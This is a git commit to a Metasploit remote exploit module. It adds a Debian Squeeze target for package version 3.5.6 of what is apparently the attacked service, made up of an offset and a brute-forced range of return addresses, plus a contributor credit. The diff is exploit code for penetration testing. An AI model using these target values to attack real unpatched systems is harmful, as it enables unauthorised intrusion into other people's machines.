Added target debian squeeze

unstable
jvazquez-r7 2012-10-05 20:12:09 +02:00
parent 8b8bfec6b8
commit 4c646762a5
1 changed files with 13 additions and 0 deletions

View File

@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'Unknown', # Vulnerability discovery
'blasty', # Exploit
'mephos', # Debian Squeeze target
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
@ -96,6 +97,18 @@ class Metasploit3 < Msf::Exploit::Remote
'Step' => 0x1000
}
}
],
['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',
{
'Offset' => 0x11c0,
'Bruteforce' =>
{
# The start should be 0x680 aligned, and then step 0x1000.
'Start' => { 'Ret' => 0xb6aaa1b0 },
'Stop' => { 'Ret' => 0xb6ce91b0 },
'Step' => 0x1000
}
}
]
],
'DisclosureDate' => 'Apr 10 2012',